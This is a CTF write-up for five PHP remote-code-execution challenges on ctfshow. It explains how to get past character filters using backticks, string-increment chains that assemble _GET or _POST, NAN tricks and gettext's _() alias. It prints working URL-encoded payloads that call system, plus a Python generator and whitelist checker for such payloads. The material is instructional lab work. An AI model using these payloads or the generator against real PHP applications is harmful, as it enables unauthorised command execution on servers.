Preface
At the time I only did two of the problems and then left; looking back at it now, I learned quite a bit.
RCE Challenge 1
Only parentheses are filtered; backticks are not. Backticks are PHP's shell-execution operator (equivalent to shell_exec()), so a command can be run without ever writing a parenthesis:
code=echo `cat /f1agaaa`;
RCE Challenge 2
Increment bypass. Double quotes can no longer be used when building the letter A, but single quotes can: concatenating an array with '' yields the string "Array" (PHP's array-to-string conversion), and its first character is A. Also, the target runs PHP 7, so eval (a language construct) and assert (a language construct since PHP 7.0) can no longer be called through a variable function name; the payload builds the name _GET instead and calls system through $_GET.
<?php
$_=[];
$_ = ''.$_;              // array-to-string conversion gives "Array"
$_=$_['!'==';'];         // '!'==';' is false, used as offset 0: "A"
$_++;$_++;
$_++;$_++;               // A + 4 = E
$__=$_;                  // park E
$_++;
$_++;                    // G
$__=$_.$__;              // "GE"
$_++;$_++;$_++;$_++;$_++;
$_++;$_++;
$_++;$_++;$_++;$_++;
$_++;
$_++;                    // G + 13 = T
$__='_'.$__.$_;          // "_GET"
($$__['_'])($$__['__']); // ($_GET['_'])($_GET['__'])
payload (query string, read through $_GET):
?_=system&__=cat /f1agaaa
The code itself, URL-encoded, goes in the ctf_show parameter:
ctf_show=%24_%3D%5B%5D%3B%24_%20%3D%20''.%24_%3B%24_%3D%24_%5B'!'%3D%3D'%3B'%5D%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24_.%24__%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D'_'.%24__.%24_%3B(%24%24__%5B'_'%5D)(%24%24__%5B'__'%5D)%3B
The following is based on:
https://blog.csdn.net/m0_64815693/article/details/127951989
For the next few problems I'm just copying the payloads over without explaining them; if you're interested, go study the link above, it explains things in great detail.
RCE Challenge 3
Allowed characters:
$ ( ) + , . / 0 1 ; = [ ] _
<?php
$_=([].[])[0];
// array . array: each side becomes the string "Array", giving "ArrayArray"; offset 0 is "A"
$_=($_/$_.$_)[0];
// "A"/"A" is 0/0, which in PHP 7 is NAN plus a warning (PHP 8 throws DivisionByZeroError instead);
// "NAN"."A" is "NANA" and offset 0 is "N". The linked article covers the arithmetic; this is the
// roundabout form, challenge 4 below does the same with 0/0 directly.
$_++; // O
$__=$_.$_++;
// A bare $_ operand is only read when the concatenation runs, while $_++ is executed beforehand
// (and returns the old value), so this sees $_ already at "P" and appends the returned "O": $__ = "PO".
// This evaluation order is what most people get stuck on, and it is the key to challenge 5 as well.
$_++; // Q
$_++; // R
$_++; // S
$_=_.$__.$_.++$_;
// The bare constant _ is undefined, so PHP 7 uses its name "_" (with a warning; PHP 8 throws an Error).
// "_"."PO"."S" is concatenated before ++$_ runs, and the pre-increment supplies "T": $_ = "_POST".
$$_[_]($$_[1]); // $_POST['_']($_POST[1])
payload:
$_=([].[])[0];$_=($_/$_.$_)[0];$_++;$__=$_.$_++;$_++;$_++;$_++;$_=_.$__.$_.++$_;$$_[_]($$_[1]);
// sending this one string is enough
URL-encoded form (ctf_show carries the code; _ and 1 must arrive in the POST body, since the code reads $_POST):
ctf_show=%24_%3D%28%5B%5D.%5B%5D%29%5B0%5D%3B%24_%3D%28%24_/%24_.%24_%29%5B0%5D%3B%24_%2B%2B%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D_.%24__.%24_.%2B%2B%24_%3B%24%24_%5B_%5D%28%24%24_%5B1%5D%29%3B&_=system&1=ls
RCE Challenge 4
Allowed characters:
$ ( ) + , . / 0 ; = [ ] _
<?php
$_=((0/0).[])[0];
// 0/0 is NAN in PHP 7 (warning only), and NAN concatenated with an array is "NANArray"; offset 0 is "N".
// This is the direct form of the trick that challenge 3 reached through "A"/"A".
$_++; // O
$__=$_.$_++; // $_++ runs before the concatenation reads $_, so $__ = "PO" (the key to challenge 5 too)
$_++; // Q
$_++; // R
$_++; // S
$_=_.$__.$_.++$_; // "_"."PO"."S", then the pre-increment's "T": $_ = "_POST"
$$_[_]($$_[0]); // $_POST['_']($_POST[0])
$_=((0/0).[])[0];$_++;$__=$_.$_++;$_++;$_++;$_++;$_=_.$__.$_.++$_;$$_[_]($$_[0]);
// submit it like this
URL-encoded form (ctf_show carries the code; _ and 0 are read back through $_POST):
ctf_show=%24_%3D%28%280/0%29.%5B%5D%29%5B0%5D%3B%24_%2B%2B%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D_.%24__.%24_.%2B%2B%24_%3B%24%24_%5B_%5D%28%24%24_%5B0%5D%29%3B&_=system&0=ls
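The letter chain in challenge 2 is counted by hand, and challenges 3 and 4 each come with a character whitelist the payload has to fit. As an added example that is not code from this write-up or from ctfshow, the Python below emulates PHP's string increment (the Perl-style carry that $_++ relies on), generates a challenge-2 style payload for any uppercase name such as _GET or _POST, and checks a payload against a whitelist. Function names, the $__, $___, ... holder variables and the sample check are this example's own choices; the challenge-3 whitelist and payload inside it are copied from the page.

```python
from __future__ import annotations

# Added example, not code from the write-up or from ctfshow: emulate PHP's
# string increment, generate a challenge-2 style payload for any uppercase
# name, and check a payload against a challenge's character whitelist.
# Function names and the $__, $___, ... holder variables are this example's
# own choices; CH3_ALLOWED / CH3_PAYLOAD are copied from challenge 3 above.

UPPER, LOWER, DIGIT = "upper", "lower", "digit"


def php_inc(s: str) -> str:
    """Emulate PHP's $s++ on a string (Perl-style alphanumeric carry).

    Scanning from the right, letters and digits roll over with carry
    ('z'->'a', 'Z'->'A', '9'->'0'); the first non-alphanumeric character
    stops the scan with no change; a carry off the left end prepends 'a',
    'A' or '1' according to the last class seen.  Purely numeric strings
    become integers in real PHP; that case is not needed here.
    """
    if s == "":
        return "1"
    chars = list(s)
    last, carry = None, False
    for i in range(len(chars) - 1, -1, -1):
        ch = chars[i]
        if "a" <= ch <= "z":
            last, carry = LOWER, ch == "z"
            chars[i] = "a" if carry else chr(ord(ch) + 1)
        elif "A" <= ch <= "Z":
            last, carry = UPPER, ch == "Z"
            chars[i] = "A" if carry else chr(ord(ch) + 1)
        elif "0" <= ch <= "9":
            last, carry = DIGIT, ch == "9"
            chars[i] = "0" if carry else chr(ord(ch) + 1)
        else:
            carry = False  # e.g. "_": PHP leaves the string untouched
            break
        if not carry:
            break
    if carry:
        chars.insert(0, {LOWER: "a", UPPER: "A", DIGIT: "1"}[last])
    return "".join(chars)


def steps_between(start: str, target: str, limit: int = 200) -> int:
    """Number of $s++ that turn `start` into `target` (error if not within limit)."""
    cur, n = start, 0
    while cur != target:
        cur, n = php_inc(cur), n + 1
        if n > limit:
            raise ValueError(f"{target!r} not reachable from {start!r}")
    return n


def build_increment_payload(name: str) -> tuple[str, list[int]]:
    """Spell `name` (e.g. "_GET") from one counter $_ seeded with "Array"[0].

    Letters are produced in ascending order and parked in $__, $___, ...
    so each is generated once; the final concatenation restores the order
    `name` needs, and ($$_['_'])($$_['__']) then reads the function name
    and its argument from that superglobal.  Returns the one-line PHP
    source and the lengths of the $_++ runs in emission order.
    """
    letters = sorted({c for c in name if c != "_"})
    if any(not ("A" <= c <= "Z") for c in letters):
        raise ValueError("only uppercase letters are reachable from 'A'")
    lines = ["$_=[];", "$_=''.$_;", "$_=$_['!'==';'];"]  # "Array"[false] -> "A"
    counts, holder, cur = [], {}, "A"
    for i, letter in enumerate(letters):
        n = steps_between(cur, letter)
        counts.append(n)
        lines.append("$_++;" * n)
        holder[letter] = "$" + "_" * (i + 2)
        lines.append(f"{holder[letter]}=$_;")
        cur = letter
    expr = ".".join("'_'" if c == "_" else holder[c] for c in name)
    lines.append(f"$_={expr};")
    lines.append("($$_['_'])($$_['__']);")
    return "".join(lines), counts


def chars_outside(payload: str, allowed: str) -> set[str]:
    """Characters used by `payload` that the whitelist `allowed` does not list."""
    return set(payload) - set(allowed)


# Whitelist and payload of RCE challenge 3, copied from the write-up above.
CH3_ALLOWED = "$()+,./01;=[]_"
CH3_PAYLOAD = ("$_=([].[])[0];$_=($_/$_.$_)[0];$_++;$__=$_.$_++;"
               "$_++;$_++;$_++;$_=_.$__.$_.++$_;$$_[_]($$_[1]);")

if __name__ == "__main__":
    src, counts = build_increment_payload("_GET")
    print(src)                                      # runs of 4, 2 and 13 increments
    print(counts)                                   # [4, 2, 13]
    print(chars_outside(CH3_PAYLOAD, CH3_ALLOWED))  # set(): the payload fits the whitelist
```

Run it to print the generated _GET chain (runs of 4, 2 and 13 increments, the same counts as the challenge-2 listing) and an empty set for the challenge-3 payload. build_increment_payload("_POST") gives the equivalent chain for $_POST; URL-encode the source with urllib.parse.quote before placing it in ctf_show, and run chars_outside on any hand-written payload against the challenge's whitelist before sending it.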
RCE Challenge 5
Allowed characters:
$ ( ) + , . / ; = [ ] _
Two things matter here: the execution order of string concatenation versus increment (the $_.$_++ trick from challenge 3), and the gettext extension, which registers _() as an alias of gettext() and so provides a callable function whose name is a single underscore. With no digits left, NAN comes from _/_: the undefined constant _ is treated as the string "_" under PHP 7, and "_"/"_" is 0/0. $%FA (and $%FF below) is a variable whose name is the single byte 0xFA, written URL-encoded; PHP accepts bytes 0x80-0xFF in identifiers, which gives a second variable name when $_ is the only ASCII one available.
Official:
<?php
$_=_(_/_)[_];     // equivalent to gettext(0/0)[0]: "NAN" at offset 0, i.e. N
$_=++$_;          // O
$%FA=_.++$_.$_;   // _PO
$_++;$_++;        // R
$%FA.=++$_.++$_;  // _POST
$$_[_]($$_[%FA]); // $_POST[a]($_POST[_])
Caveat on this listing as copied here: by the evaluation order shown in challenge 3, a plain $_ is read only when the concatenation that uses it runs, so _.++$_.$_ gives "_PP" rather than the "_PO" in the comment, and the last line indexes $_ (incremented to "T" by then) instead of $%FA, where the name was assembled. The next listing is self-consistent and is the one to reproduce.
练习两年半的篮球选手's version:
<?php
$_=(_/_._)[_];          // "_"/"_" is NAN, "NAN"."_" is "NAN_", offset 0: N
$_++;                   // O
$%FA=$_.$_++;           // "PO": $_++ runs first, then $_ (already "P") is read
$_++;$_++;              // R
$_=_.$%FA.++$_.++$_;    // "_"."PO"."S"."T" = "_POST"
$$_[_]($$_[%FA]);       // $_POST['_']($_POST["\xFA"])
佚名大佬's version:
<?PHP
$_=_(_._)[_];           // N (author's note: for local testing use (_._._)[_] instead)
$%FA=++$_;              // O
$$%FA[$%FA=_.++$_.$%FA[$_++/$_++].++$_.++$_]($$%FA[%FF]);
// Everything is folded into one statement: the assignment inside the brackets builds "_POST"
// in $%FA, and the value of that assignment doubles as the key, so the call resolves to
// $_POST['_POST']($_POST["\xFF"]).
// Putting the whole concatenation on one line like this is seriously impressive; all I can say is nb.